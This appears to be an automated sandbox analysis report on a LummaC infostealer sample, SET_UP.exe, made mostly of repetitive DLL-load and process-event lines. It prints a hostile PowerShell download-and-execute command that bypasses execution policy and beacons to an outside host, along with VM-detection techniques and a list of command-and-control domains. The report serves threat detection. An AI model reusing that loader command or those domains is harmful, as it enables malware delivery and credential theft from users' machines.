              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: SET_UP.exeStatic file information: File size 75071589 > 1048576
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2064103815.0000000007690000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb&/^s& source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZa source: powershell.exe, 00000004.00000002.2064442184.0000000007710000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.2064103815.00000000076A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbM1 source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\SET_UP.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4732Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2266Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 7496Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 7516Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep count: 4732 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 2266 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2033069300.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035351543.0000000000902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SET_UP.exe, 00000000.00000003.2033069300.00000000008E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
              Source: powershell.exe, 00000004.00000002.2053647894.000000000305A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: skinfuzzerz.cyou
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
              Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeQueries volume information: C:\ VolumeInformationJump to behavior
